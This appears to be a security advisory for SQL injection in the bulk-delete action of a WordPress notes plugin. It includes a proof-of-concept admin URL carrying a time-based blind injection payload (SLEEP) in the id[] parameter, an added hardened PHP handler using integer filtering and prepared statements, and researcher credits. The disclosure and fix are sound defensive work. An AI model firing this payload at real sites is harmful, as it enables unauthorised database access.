The plugin does not sanitise or escape the ids submitted with bulk actions before using them in a SQL statement on an admin page, leading to SQL injection.
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&action=delete&paged=1&id%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id%5B%5D=19&action2=delete
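A hardened bulk-delete handler for the kind of request shown above, as an added example that is not the plugin's own code. The function names, the `example_notes` table and the `bulk-notes` nonce action are assumptions; the code is meant to run inside WordPress.

```php
<?php
// Added example: hypothetical bulk-delete handler, not the plugin's code.
// Runs inside wp-admin; table name and nonce action are assumed.

/**
 * Reduce the raw id[] request value to unique positive integers.
 * Values that are not purely digits (e.g. "18 AND (...)") are dropped.
 */
function example_clean_ids( $raw ) {
    $ids = array();
    foreach ( (array) $raw as $value ) {
        if ( is_string( $value ) && ctype_digit( $value ) && (int) $value > 0 ) {
            $ids[] = (int) $value;
        }
    }
    return array_values( array_unique( $ids ) );
}

function example_bulk_delete() {
    global $wpdb;

    // Capability and nonce checks first. They limit who can reach the
    // query but do not make the query itself safe.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'bulk-notes' ); // assumed nonce action

    $raw = isset( $_GET['id'] ) ? wp_unslash( $_GET['id'] ) : array();
    $ids = example_clean_ids( $raw );
    if ( empty( $ids ) ) {
        return 0; // nothing valid to delete
    }

    $table = $wpdb->prefix . 'example_notes'; // assumed table name

    // Unsafe pattern of the class the advisory describes (do not use):
    //   "DELETE FROM $table WHERE id IN (" . implode( ',', $_GET['id'] ) . ")"

    // One %d placeholder per id; prepare() binds each value as an integer.
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    return $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE id IN ( {$placeholders} )", $ids )
    );
}
```

With the request above, `example_clean_ids()` keeps `19` and discards the first `id[]` value, so only integer ids reach the prepared statement.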
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09 (about 1 year ago)
2022-05-12 (about 1 year ago)
2022-05-14 (about 1 year ago)